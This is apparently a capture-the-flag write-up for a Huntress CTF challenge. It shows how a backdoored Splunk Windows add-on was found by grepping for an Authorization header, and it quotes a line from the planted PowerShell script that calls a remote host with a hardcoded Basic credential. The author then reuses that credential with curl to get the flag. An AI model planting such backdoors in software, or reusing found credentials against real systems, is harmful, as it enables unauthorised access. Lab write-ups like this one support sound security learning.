Home >

Huntress CTF > Medium Challenges

Back <> Next

You’ve probably seen Splunk being used for good, but have you seen it used for evil?

We were given a ‘Splunk_TA_windows.zip’ file to download.Once the contents were extracted we are given several directories and files to inspect.

Furthermore, by curling the provided url we get the following response:

curl http://chal.ctf.games:30644/                                                                                                                  
{"error":"Missing or invalid Authorization header"}

It seems as though we are missing an Authorization header in the request. We can then see if there is one present in the extracted files using:

grep -ri Authorization

We get a hit in the results that looks promising: splunk2

bin/powershell/nt6-health.ps1:$OS = @($html = (Invoke-WebRequest http://chal.ctf.games:$PORT -Headers @{Authorization=("Basic YmFja2Rvb3I6dXNlX3RoaXNfdG9fYXV0aGVudGljYXRlX3dpdGhfdGhlX2RlcGxveWVkX2h0dHBfc2VydmVyCg==")} -UseBasicParsing).Content

We decided to try to curl the url and included the paramater like so:


curl http://chal.ctf.games:30644/ -H Authorization:"Basic YmFja2Rvb3I6dXNlX3RoaXNfdG9fYXV0aGVudGljYXRlX3dpdGhfdGhlX2RlcGxveWVkX2h0dHBfc2VydmVyCg=="

We were given a response this time with a base64 encoded message. We were able to decode the response and submit the flag! splunk